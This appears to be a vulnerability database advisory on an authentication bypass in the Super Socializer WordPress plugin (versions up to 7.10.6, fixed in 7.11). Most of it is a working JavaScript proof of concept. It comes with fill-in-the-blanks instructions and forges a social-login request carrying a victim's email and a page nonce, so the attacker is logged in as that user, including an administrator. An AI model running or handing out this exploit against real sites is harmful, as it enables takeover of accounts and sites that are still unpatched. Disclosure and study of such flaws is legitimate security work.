Super Socializer <= 7.10.6 - Authentication Bypass



Description
You can log in to the site with any user if you know the user's email address.
Proof of Concept
// Steps:
// Fill this 3 variable
var url = 'http://my-site.com/wordpress/', //website url. Closing slash required
  email = 'john.doe@my-site.com', //The admin email address to exploit
  nonce = 'e86377d05a'; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. copy here the nonce value Ex.: var the_champ_sl_ajax_token = {"ajax_url":"http:\/\/my-site.com\/wordpress\/wp-admin\/admin-ajax.php","security":"e86377d05a"};
// Click on Run in JsFiddle and then click on the Exploit button. It will open a window which first log you in to the user with the given email address then loads the admin area and you will be logged in.

function exploit() {
  var param = {
    action: 'the_champ_user_auth',
    security: nonce,
    'profileData[id]': 'a',
    'profileData[link]': 'a',
    'profileData[name]': 'a',
    'profileData[email]': email,
    'profileData[first_name]': 'a',
    'profileData[last_name]': 'a',
    provider: 'facebook',
    redirectionUrl: encodeURI(url)
  };
  OpenWindowWithPost(url + "wp-admin/admin-ajax.php",
    "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);


  setTimeout(function() {
    window.open(url + "wp-admin/", 'exploit');
  }, 2000);
}

$(document).ready(function() {
  $('button').on('click', exploit);
});


function OpenWindowWithPost(url, windowoption, name, params) {
  var form = document.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", url);
  form.setAttribute("target", name);

  for (var i in params) {
    if (params.hasOwnProperty(i)) {
      var input = document.createElement('input');
      input.type = 'hidden';
      input.name = i;
      input.value = params[i];
      form.appendChild(input);
    }
  }

  document.body.appendChild(form);

  var wnd = window.open("", name, windowoption);

  form.submit();

  document.body.removeChild(form);

  return wnd;
}

Affects Plugin

fixed in version 7.11

References

URL https://jsfiddle.net/5jh37uet/
URL https://plugins.trac.wordpress.org/changeset/1832860/super-socializer

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 1314
Verified No
WPVDB ID 9043

Timeline

Publicly Published 2018-03-03 (10 months ago)
Added 2018-03-15 (9 months ago)
Last Updated 2018-03-15 (9 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.